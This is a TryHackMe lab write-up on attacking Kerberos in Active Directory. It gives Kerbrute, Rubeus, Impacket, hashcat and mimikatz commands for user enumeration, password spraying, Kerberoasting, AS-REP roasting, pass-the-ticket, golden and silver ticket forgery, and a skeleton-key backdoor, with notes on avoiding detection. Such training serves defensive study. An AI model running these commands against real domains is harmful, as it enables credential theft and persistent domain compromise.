# Attacking Kerberos

**Room Link:** <https://tryhackme.com/room/attackingkerberos>

## Presteps for Lab

### Kerbrute Installation

Download a precompiled binary for your OS - <https://github.com/ropnop/kerbrute/releases>

```
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 -O kerbrute && chmod +x kerbrute 
```

### Impacket Installation

```
wget https://github.com/fortra/impacket/archive/refs/tags/impacket_0_9_19.tar.gz
tar xvf impacket_0_9_19.tar.gz 
cd impacket-impacket_0_9_19
pip install .
```

### Download wordlists

```
wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt
wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt
```

### Add hostname to hosts file

`$VICTIM` is the IP address of the lab domain controller. Kerberos requests are addressed by name, so the domain name has to resolve before any of the tools below will work.

```
echo $VICTIM CONTROLLER.local  >> /etc/hosts
cat /etc/hosts
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FB6Y4hveiRSRTnDGuNHBz%2Fimage.png?alt=media&#x26;token=5a472a24-3221-456c-8e96-8a0324a57d02" alt=""><figcaption></figcaption></figure>

## Enumeration w/ Kerbrute

Kerbrute `userenum` sends an AS-REQ for every name in the wordlist. The KDC answers `KRB5KDC_ERR_PREAUTH_REQUIRED` for an account that exists and `KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN` for one that does not, so valid usernames are confirmed without ever submitting a password. No logon is attempted, so bad-password counters are not incremented and no 4625 failed-logon events are generated; the only trace is Kerberos 4768 events on the DC, if that auditing is enabled.

```
./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F86AaTodjWpUYP5VH8oZJ%2Fimage.png?alt=media&#x26;token=d2819e76-4dce-4b81-88aa-0d40d76d6ee0" alt=""><figcaption></figcaption></figure>

## Harvesting & Brute-Forcing Tickets w/ Rubeus

Login with provided credentials

**Kali**

```
ssh Administrator@$VICTIM
Password: P@$$W0rd
```

Rubeus `harvest` polls LSASS for TGTs at the given interval (every 30 seconds here) and prints each new one base64-encoded as a `.kirbi`, so any account that logs on while it runs hands you a reusable ticket. It needs an elevated session, which is why the lab gives you Administrator.

**Victim**

```
cd Downloads
Rubeus.exe harvest /interval:30
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FpKn9wI2r2A0Cz4nDY97E%2Fimage.png?alt=media&#x26;token=fb14bd93-7f6a-4bf2-8d40-e9255fde4d97" alt=""><figcaption></figcaption></figure>

Rubeus `brute` sprays one password against every user it can enumerate from the domain (it needs to resolve the domain, hence the hosts entry below). By default it also requests and prints the base64 `.kirbi` TGT for each account where the password matched; `/noticket` skips that and only reports which accounts accepted the password. One password across many users stays under most lockout thresholds, but every attempt is a real AS-REQ that the DC logs as 4768 (success) or 4771 (pre-authentication failure).

**Victim**

```
echo $VICTIM CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
cd Downloads
Rubeus.exe brute /password:Password1 /noticket
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FFdWiHqWKeVY8e6sVzOu1%2Fimage.png?alt=media&#x26;token=d67fb583-a519-4c59-8907-afa57d93c158" alt=""><figcaption></figcaption></figure>

## Kerberoasting w/ Rubeus & Impacket

### Kerberoasting #1 - Rubeus

Rubeus `kerberoast` asks the KDC for a service ticket for every user account that has an SPN set and dumps the encrypted part of each ticket. Any authenticated domain user can do this; the ticket is encrypted under the service account's own key (its NTLM hash when RC4, etype 23, is negotiated), so the blob can be cracked offline with no further contact with the DC. Machine accounts are skipped because their passwords are random and 120 characters long.

**Victim**

```
cd Downloads
Rubeus.exe kerberoast
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FV7sKDd4WIRuDoVRM5O2R%2Fimage.png?alt=media&#x26;token=c9217713-9bf1-4a3a-a46e-9f164ea570d9" alt=""><figcaption></figcaption></figure>

Copy the hashes from the Rubeus output onto the attacker machine into a text file. Rubeus wraps each hash across several indented lines, while hashcat wants one hash per line with no whitespace and errors out on the raw paste. The command below strips all whitespace and starts a new line at every `$krb5tgs$23$*` prefix. Newer Rubeus builds can write the file directly with `kerberoast /format:hashcat /outfile:hashes.txt`.

**Kali**

```
tr -d ' \t\r\n' < hashes.txt | sed 's/\$krb5tgs\$23\$\*/\n&/g' | sed '/^$/d' > hash.txt
hashcat -m 13100 -a 0 hash.txt Pass.txt
```

Hashcat found the passwords for both of the hashes.

```
hashcat -m 13100 -a 0 hash.txt Pass.txt --show
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXXAAj6l4zrCwYJU0PUAL%2Fimage.png?alt=media&#x26;token=9dabe125-433b-4ff5-8bc8-b053eef187f1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FxQjIiIsvJxD2GImksC7H%2Fimage.png?alt=media&#x26;token=eabe16b4-da17-4858-9af8-bbbe12c7284d" alt=""><figcaption></figcaption></figure>

### Kerberoasting #2 - Impacket

`GetUserSPNs.py` does the same from Kali with the low-privileged domain credentials: it pulls every account that has an SPN from the DC over LDAP and, with `-request`, asks for a TGS for each. The path below is the checkout the write-up used; the pip install above also puts `GetUserSPNs.py` on your PATH.

```
sudo python3.9 /root/test/impacket/examples/GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip $VICTIM -request > hashes.txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F2Wpzp8J51QPI5UByHxNc%2Fimage.png?alt=media&#x26;token=bab25c15-09e3-4d93-90ca-308a6300c394" alt=""><figcaption></figcaption></figure>

Impacket finds the same two accounts Rubeus did and, unlike Rubeus, prints each hash on a single line already in hashcat's `$krb5tgs$23$` format, so the file can be fed to hashcat as-is. The table header that also landed in `hashes.txt` is harmless: hashcat skips lines it cannot parse with a token-length warning.

```
hashcat -m 13100 -a 0 hashes.txt Pass.txt
hashcat -m 13100 -a 0 hashes.txt Pass.txt --show
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FYc31ofVqkPQOsfmDs2iC%2Fimage.png?alt=media&#x26;token=ce0b1f82-ad17-433e-be5b-4a9d650a6e0a" alt=""><figcaption></figcaption></figure>

## AS-REP Roasting w/ Rubeus

AS-REP roasting targets accounts that have "Do not require Kerberos preauthentication" set. For those the KDC answers an AS-REQ without any proof of the password, and the AS-REP it returns contains a blob encrypted under the user's key, which can be cracked offline just like a Kerberoast hash. Rubeus finds such accounts through LDAP and requests the AS-REP for each.

**Victim**

```
cd Downloads
Rubeus.exe asreproast
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXDnIbDloFK8l78LjJMOK%2Fimage.png?alt=media&#x26;token=aed044cf-a052-48cb-b903-bd4d852c7ea6" alt=""><figcaption></figcaption></figure>

**Kali**

Transfer the hashes from the target machine over to Kali and put them into a text file. Rubeus prints AS-REP hashes in John format (`$krb5asrep$User@...`), while hashcat mode 18200 expects the encryption type after the prefix, so `23$` has to be inserted to get `$krb5asrep$23$User@...`. The command below does that replacement and removes the line wrapping so hashcat can parse the hashes. Newer Rubeus builds produce the hashcat form directly with `asreproast /format:hashcat`.

```
tr -d ' \t\r\n' < hashes.txt | sed 's/\$krb5asrep\$/\n&/g' | sed '/^$/d' | sed 's/^\$krb5asrep\$/&23$/' > hash.txt
hashcat -m 18200 -a 0 hash.txt Pass.txt
```

Both passwords cracked.

```
hashcat -m 18200 hash.txt Pass.txt --show
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FfDuuI59YsXAEhLUMbNgb%2Fimage.png?alt=media&#x26;token=bf4cfd79-ff3e-42f5-8f0a-d251445394fa" alt=""><figcaption></figcaption></figure>

## Pass the Ticket w/ mimikatz

### Prepare Mimikatz & Dump Tickets

**Victim**

```
cd Downloads
mimikatz.exe
```

`privilege::debug` requests SeDebugPrivilege so mimikatz can read LSASS; `sekurlsa::tickets /export` then writes every Kerberos ticket held in LSASS, for every logon session on the box, to a `.kirbi` file in the current directory. That is why this has to run as a local administrator.

**Victim - Mimikatz**

```
privilege::debug
sekurlsa::tickets /export
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXucs9Es3bDxHQxUHCLbL%2Fimage.png?alt=media&#x26;token=b3c7af8e-4093-4121-8b70-d12ff5c20e98" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FxCG3Lr1A6vmVeVFNn4BW%2Fimage.png?alt=media&#x26;token=8b447827-5d5c-498c-8b7b-8b8c8a80f61c" alt=""><figcaption></figcaption></figure>

### Pass the Ticket w/ Mimikatz

Run this inside mimikatz with one of the `.kirbi` files exported above. `kerberos::ptt` loads the ticket into the current logon session's Kerberos cache, so from now on this session authenticates with that ticket instead of its own credentials. The file name below is the Administrator TGT from the export; substitute whichever file you want to use.

**Victim - Mimikatz**

```
kerberos::ptt [0;2b4efc]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F8PIcCZZAXvu1LoVtAPdB%2Fimage.png?alt=media&#x26;token=10223ea6-53e7-4a75-97c6-8ac6002b3588" alt=""><figcaption></figcaption></figure>

Here we're just verifying that the ticket was injected by listing the session's cached tickets.

**Victim**

```
klist
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FFpLtTMYPFKgWfx4OJCEe%2Fimage.png?alt=media&#x26;token=d57dd715-ce46-481d-9cae-36d664426f15" alt=""><figcaption></figcaption></figure>

Your session now carries that TGT, so anything you do over Kerberos is done with the rights of the account it was issued to. To check, list the DC's administrative share. One caveat: a UNC path addressed by IP normally negotiates NTLM rather than Kerberos, so to prove the injected ticket is actually being used, address the share by hostname instead and look for a new `cifs/` service ticket in `klist` afterwards.

**Victim**

```
dir \\$VICTIM\admin$
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FajsQnqdRHTy9j1Fll8BG%2Fimage.png?alt=media&#x26;token=1f61d04c-2a23-4103-9700-8b002ed6bf99" alt=""><figcaption></figcaption></figure>

## Golden/Silver Ticket Attacks w/ mimikatz

**Victim**

```
cd downloads && mimikatz.exe
```

`lsadump::lsa /inject /name:krbtgt` reads the krbtgt account out of LSASS on the DC and prints its NTLM hash and its SID. The domain SID that `kerberos::golden` needs is that SID without its last component (the RID, 502 for krbtgt). For a silver ticket, change `/name:` to the account the target service runs as, for example SQLService, and take that account's NTLM hash instead.

**Victim - Mimikatz**

```
privilege::debug
lsadump::lsa /inject /name:krbtgt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FiGOZs8mjleRHiBueJx31%2Fimage.png?alt=media&#x26;token=9fab7689-17e9-446b-8561-0d0fe24a8051" alt=""><figcaption></figcaption></figure>

### Create a Golden/Silver Ticket

Neither attack dumps a ticket; what you dump is a key. A golden ticket is a TGT you forge yourself and sign with the krbtgt account's NTLM hash, so the KDC accepts it and issues service tickets for whatever user and group memberships you wrote into it. A silver ticket is a service ticket (TGS) forged with the NTLM hash of the account the service runs as, for example SQLService; the service validates it locally with its own key and never contacts the DC, so the DC logs nothing. Both need the domain SID (the account SID from the dump with its trailing RID removed), and both stay valid until the key they were signed with changes, which for krbtgt means resetting its password twice.

#### Golden Ticket

This is the command for creating a golden ticket. `/sid:` is the domain SID and `/krbtgt:` the krbtgt NTLM hash from the dump above; `/user:` is the account the ticket will claim to be. `/ptt` injects the forged ticket straight into the current logon session; without it mimikatz only writes `ticket.kirbi` to disk, which you would then have to load with `kerberos::ptt ticket.kirbi`.

**Victim - Mimikatz**

```
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /ptt
```

#### **Silver Ticket**

Silver tickets are built with the same `kerberos::golden` module but from different inputs: the key is the target service account's NTLM hash (`/rc4:`), `/sid:` is still the domain SID, and `/target:` and `/service:` name the host and the service class the ticket is for (for example `cifs` for SMB or `MSSQLSvc` for SQL Server). `/id:` sets the RID the ticket claims for `/user:`; the room uses 1103. Keeping the krbtgt hash and only adding `/id:1103`, as the room text suggests, still produces a golden ticket. The angle-bracket placeholders below are values you take from your own `lsadump` output and target.

**Victim - Mimikatz**

```
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /target:<service host FQDN> /service:<service class> /rc4:<SQLService NTLM hash> /id:1103 /ptt
```

### Use the Golden/Silver Ticket to access other machines

`misc::cmd` launches a new cmd.exe from inside mimikatz. Because `/ptt` injected the forged ticket into the current logon session (without `/ptt` mimikatz only writes `ticket.kirbi`, which you would first load with `kerberos::ptt ticket.kirbi`), that shell and anything started from it authenticates to the domain with the forged ticket: any machine and service for a golden ticket, or just the one service named in a silver ticket.

```
misc::cmd
```

The same `lsadump` command dumps any other account; the room asks for these two. NTLM hash of Administrator:

```
lsadump::lsa /inject /name:Administrator 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F4HUpD8UEA3i86v4Z1pk3%2Fimage.png?alt=media&#x26;token=dbcb6e9d-897b-438e-bde5-a97b42e1a965" alt=""><figcaption></figcaption></figure>

NTLM hash of SQLService, which is the key a silver ticket for its service would be signed with:

```
lsadump::lsa /inject /name:SQLService 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FkqSZkfOiMQSmuKJ0zNAV%2Fimage.png?alt=media&#x26;token=e39a2363-a166-4a0b-a464-c68b74d195a7" alt=""><figcaption></figcaption></figure>

## Kerberos Backdoors w/ mimikatz

`misc::skeleton` patches LSASS on the domain controller so that, alongside every account's real password, the master password `mimikatz` is accepted for any domain user authenticating with Kerberos RC4. The patch lives only in memory, so it is gone after the DC reboots, and it needs `privilege::debug` to apply (and the mimidrv driver if LSA protection is enabled on the DC).

**Victim**

```
cd Downloads && mimikatz.exe
```

**Victim - Mimikatz**

```
privilege::debug
misc::skeleton
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FUgte7VoV7M5K6YnDDHdB%2Fimage.png?alt=media&#x26;token=8d5fcd18-a405-4fda-98b1-c03dbbcb945f" alt=""><figcaption></figcaption></figure>

**Victim**


